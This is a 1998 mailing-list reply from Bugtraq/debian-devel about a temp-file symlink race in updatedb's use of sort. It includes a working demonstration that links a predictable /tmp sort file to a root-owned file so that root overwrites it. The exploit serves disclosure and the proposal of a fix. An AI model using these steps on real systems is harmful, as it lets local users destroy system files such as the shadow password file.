Re: overwrite any file with updatedb
This message is crossposted to the Bugtraq and debian-devel mailing lists.
Please post replies to the relevant list(s) only.
On Mon, 2 Mar 1998, Bryan Andregg wrote:
> On Sun, 1 Mar 1998 22:44:11 -0500, Cain wrote:
>
> >If this is already known, my apologies. It seemed very strange that this
> >worked, so I thought it would be mentionable.
> >
> >On many linux systems(Redhat imparticularly) updatedb is run nightly
> >around 1:00. When it sorts the files that find gets, it creats a few files
> >in /tmp called sort0<pid>000{1,2,etc}. Each is around 512k. The
> >first file is created and filled, then if necassary, another is created
> >and so on until it has your whole filesystem into a nice database. Well,
> >once the first file is created you can easily guess what the next filename
> >will be called as only the last character will change. If you create a
> >link to say, the shadow password file, updatedb will kindly overwrite it
> >for you. Ex:
>
> It should be pointed out that on Red Hat 4.2 and 5.0 updatedb runs as user
> nobody by default.
>
> This is not a security issue unless you are running a distribution at least a
> year old.
>
> We will be checking for the proper use of temp files in the source also.
I don't have a Red Hat system at hands to test this, so let me tell you
what it's like on a Debian pre-2.0 system, which I am currently using.
On my system, this bug is present.
Daily, cron runs "run-parts /etc/cron.daily" as root. In this directory is
a file named "find" with these contents:
----begin----
#! /bin/sh
#
# cron script to update the `find.codes' database.
#
# Written by Ian A. Murdock <imurdock@debian.org> and
# Kevin Dalley <kevin@aimnet.com>
if [ -f /etc/updatedb.conf ]; then
. /etc/updatedb.conf
fi
cd / && updatedb --localuser=nobody 2>/dev/null
----end----
/usr/bin/updatedb is a bash script which calls sort to sort the file
lists. Thus, sort runs as root.
This makes the whole thing easy to exploit (things between dashes are
comment):
# touch /root/testfile
# ls -l /root/testfile
-rw-r--r-- 1 root root 0 Mar 3 10:16 /root/testfile
# /etc/cron.daily/find
-- other xterm --
$ cd /tmp
$ ls
sort1636700000
$ ln -s /root/testfile sort1636700002
-- wait a while --
$ ls
sort1636700000 sort1636700001 sort1636700002 sort1636700003
-- other xterm --
# ls -l /root/testfile
-rw-r--r-- 1 root root 524275 Mar 3 10:27 /root/bla
-- end of session --
I think the only way to really fix this is to patch sort, so that it
doesn't create files with easy-to-predict names. See "man 3 tmpfile" for a
good hint on this.
Remco Blaakmeer
Owner of a Debian GNU/Linux system
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-request@lists.debian.org .
Trouble? e-mail to templin@bucknell.edu .
Reply to: